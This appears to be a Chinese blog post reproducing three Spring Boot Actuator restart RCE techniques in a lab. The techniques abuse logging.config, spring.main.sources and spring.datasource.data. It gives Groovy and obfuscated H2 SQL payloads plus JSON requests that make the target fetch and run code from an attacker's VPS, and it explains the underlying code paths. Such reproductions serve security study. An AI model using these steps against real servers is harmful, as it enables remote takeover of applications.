restart漏洞

最新推荐文章于 2024-06-13 16:56:58 发布
最新推荐文章于 2024-06-13 16:56:58 发布
阅读量585 收藏
点赞数
分类专栏: java安全 文章标签: 安全 spring boot java web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121848872
版权

restart logging.config groovy RCE

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce

漏洞复现:

  1. python3 -m http.server 80 命令在 VPS 上开启 WEB 服务

  2. 编写 example.groovy 文件放到 VPS WEB 根目录下

    Runtime.getRuntime().exec('calc.exe')

  3. 访问 /actuator/env 接口改变 logging.config 属性值

    http://localhost:9098/actuator/restart
application/json

{"name":"logging.config","value":"http://192.168.43.141/example.groovy"}

  4. 访问 /actuator/restart 接口重启应用

漏洞原理:

通过访问 /actuator/env 接口改变 logging.config 属性值,然后访问 /actuator/restart 接口重启应用,这时会访问 logging.config 属性值执行的 URL 文件,这时会在 ch.qos.logback.classic.util.ContextInitializer#configureByResource 方法根据 URL 文件后缀为 groovy,最终会执行 groovy 代码

ContextInitializer#configureByResource:
image-20211210084001650
函数调用栈:
image-20211210084244692
注意点:

  1. 上传到 VPS 上的 example.groovy 文件不能是畸形 groovy 语法,否则服务器会异常退出
  2. 确保服务器导入了 groovy 依赖,否则服务器会异常退出

restart spring.main.sources groovy RCE

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce

漏洞复现:

  1. python3 -m http.server 80 命令在 VPS 上开启 WEB 服务

  2. 编写 example.groovy 文件放到 VPS WEB 根目录下

    Runtime.getRuntime().exec('calc.exe')

  3. 访问 /actuator/env 接口改变 spring.main.sources 属性值

    http://localhost:9098/actuator/restart
application/json

{"name":"spring.main.sources","value":"http://192.168.43.141/example.groovy"}

  4. 访问 /actuator/restart 接口重启应用

漏洞原理:

通过访问 /actuator/env 接口改变 spring.main.sources 属性值,然后访问 /actuator/restart 接口重启应用,spring.main.sources 属性值对应着的是 ApplicationContext 的额外源地址,重启应用后会请求spring.main.sources 属性指向的 URL 地址,org.springframework.boot.BeanDefinitionLoader#load 方法会根据 URL 指向的文件的后缀为 groovy,会执行文件内容中的 groovy 代码

BeanDefinitionLoader#load:
image-20211210085638565
函数调用栈:
image-20211210085757501

restart spring.datasource.data h2 database RCE

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce

漏洞复现:

  1. python3 -m http.server 80 在 VPS 上开启 WEB 服务

  2. 编写需要执行的 h2 sql 代码并上传至 VPS WEB 根目录

    CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('CMD','/C','calc');

  3. 访问 /actuator/env 接口改变 spring.datasource.data 属性值为 VPS 上恶意的 h2 sql 代码文件

    http://localhost:9098/actuator/env
application/json

{"name":"spring.datasource.data","value":"http://192.168.43.141/example.sql"}

  4. 访问 /actuator/restart 接口重启应用

    http://localhost:9098/actuator/restart
application/json

漏洞原理:

访问 /actuator/env 接口改变 spring.datasource.data 属性值为 VPS 上恶意的 h2 sql 代码,然后访问 /actuator/restart 接口重启应用,在重启应用时会 调用org.springframework.boot.autoconfigure.DataSourceInitializer#runScripts 方法执行 h2 sql 代码,最终RCE

DataSourceInitializer#runScripts:
image-20211210091332816
函数调用栈:
image-20211210091400859
注意点和利用条件:

  1. VPS 上的 h2 sql 语法不能畸形,否则会导致程序异常退出
  2. 环境存在相关依赖(h2databasespring-boot-starter-data-jpa
  3. 没重启执行一次命令都需要把 VPS 上的 h2 sql 内容的函数名改一下

Reference:

https://github.com/colocup/SpringBootVulExploit

0x6b79
关注
专栏目录
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 4995
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
restart h2 database query RCE复现
12-09 3122
restart h2 database query RCE复现
三十三、Springboot整合 Actuator
panchang199266的博客
10-27 385
(一)Actuator简介 参见Spring Boot 2.0 中使用 Actuator (二)具体实现 1、首先设置访问端口和根路径,暴露可访问的接口 management: server: #监控端口 port: 8081 servlet: #监控的根路径 context-path: / #暴露所有监控接口 endpoints: ...
Spring Cloud上下文:应用程序上下文服务
Carrieº 的博客
10-20 384
Spring Boot对于如何使用Spring构建应用程序有一个看法:例如它具有常规配置文件的常规位置,以及用于常见管理和监视任务的端点。Spring Cloud建立在此之上,并添加了一些可能系统中所有组件将使用或偶尔需要的功能。 引导应用程序上下文 一个Spring Cloud应用程序通过创建一个“引导”上下文来进行操作,这个上下文是主应用程序的父上下文。开箱即用,负责从外部源加载配置属性,还解...
SpringBoot 监控神器——Actuator 保姆级教程
weixin_44421461的博客
06-13 2205
点击上方“Java基基”,选择“设为星标”做积极的人,而不是积极废人!每天14:00更新文章,每天掉亿点点头发...源码精品专栏原创 | Java 2021超神之路,很肝~中文详细注释的开源项目RPC 框架 Dubbo 源码解析网络应用框架 Netty 源码解析消息中间件 RocketMQ 源码解析数据库中间件 Sharding-JDBC 和 MyCAT 源码解析作业调度中间件 Elast...
Spring Boot Actuator 漏洞复现合集
drnrrwfs的博客
06-12 9704
Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
Redhat6.5升级openSSH-8.7p1修补扫描openSSH漏洞.zip
09-26
6. 重启SSH服务以应用更改:`service sshd restart`。 7. 测试新版本的OpenSSH是否正常工作,并确认旧版本已移除。 在整个过程中,需要注意的是,升级关键系统组件可能会对现有服务造成影响,因此建议在非生产环境...
openssh kex.c拒绝服务漏洞漏洞(CVE-2016-8858)处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
05-23 873
该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。代码修复链接如下:http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c#rev1.127。补丁下载:http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c。更多参看:https://cve.mitre.org/cgi-bin/cvename.cgi?
vsftpd FTP Server lsc远程拒绝服务漏洞
07-03
6. **重启服务**:执行`service xinetd restart`命令使配置生效。 7. **让vsftpd作为独立服务运行**: - 在`/etc/xinetd.d/vsftpd`文件中将`disable=no`改为`disable=yes`。 - 在`/etc/vsftpd.conf`文件末尾...
OpenSSH 代码问题漏洞(CVE-2023-38408)升级到最新版
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
10-16 2971
其中,ssh-agent是一个后台程序,可缓存用于SSH公钥身份验证的私钥,通过跟踪用户的身份密钥和密码来简化用户身份验证过程。一旦这些密钥存储在ssh-agent中,它就允许用户访问其他服务器,而无需重新输入密码或密码,从而提供流畅的单点登录(SSO)体验,从而减少常规密码输入的需要。通过Openssh配置(sshd_config)、防火墙,安全组ACL等限制来源访问IP为白名单仅可信IP地址,同时,非必要,关闭SSH代理转发功能,禁止在有关主机启用ssh隧道等。,或升级到9.4p1或9.5p1版本;
漏洞挖掘】——87、NFS未授权访问利用
最新发布
Fly_鹏程万里
06-13 413
NFS(Network File System,网络文件系统)是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源,在NFS的应用中本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件就像访问本地文件一样,如今NFS具备了防止被利用导出文件夹的功能,但遗留系统中的NFS服务配置不当,则仍可能遭到恶意攻击者的利用。
Spring Boot RCE到内存马探索
小王的储物间
02-13 1280
SpringBootVulExploit是Spring Boot漏洞Checklist,但在真正的环境中进行漏洞利用还是有一段距离的,因此衍生出了SpringBootExploit工具。本文是对该Checklist到内存马探索之路的记录。可能是大多数人没有需求,或者是安全研究员没有打红队的原因。导致利用方式普遍都是以弹计算器为最终结果,不能进一步深入利用,导致很多漏洞不了了之。目前网上普遍分析文章,复现文章都是以弹计算器结束,但这其实与实战化的需求还存在着很远的一段路程。
java代码审计工具_Java代码审计汇总系列(六)——RCE
weixin_42315341的博客
02-16 1482
一、概述任意代码执行(Remote Code Execution)是危害最为严重的漏洞之一,挖掘难度也是相对高的,除了常见的文件上传漏洞,还有OS命令注入、表达式注入、模板注入、代码注入和第三方组件漏洞,下面依次讲解审计方法和技巧。二、分类挖掘技巧1、OS命令注入OS命令注入涉及执行系统命令,通过关键字定位执行命令的方法是否参数可控,常用的搜索关键字有:System|exec|passthru|...
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 7277
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
ElasticSearch几个漏洞总结
热门推荐
u011066706的专栏
04-17 2万+
ElasticSearch远程命令执行(CVE-2014-3120) 漏洞介绍: ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如
Java代码审计rce漏洞
m0_55772907的博客
11-15 866
代码审计
Jenkins RCE 漏洞(CVE-2019-1003000) 复现
玄道的网安博客
09-24 3507
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1135
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
Java代码审计之RCE(远程命令执行)
liguangyao213的博客
03-02 6122
Java代码审计系列课程(点我哦) 漏洞原理: RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。 出现此类漏洞通常由于应用系统从设计上须要给用户提供指定的远程命令操做的接口。通常会给用户提供一个ping操做的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而若是设计者在完成该功能时,没有作严格的安全控制,则可能会致使攻击者经过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 runti
SSL-TLS安全漏洞检测与Apache、Nginx修复教程
接着,使用`sudo service httpd restart`重启Apache服务。 - **TOMCAT修补**(对于Java应用服务器): - 对于TOMCAT,虽然文中没有直接提供具体步骤,但通常也需要修改服务器的SSL配置文件,比如`server.xml`,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值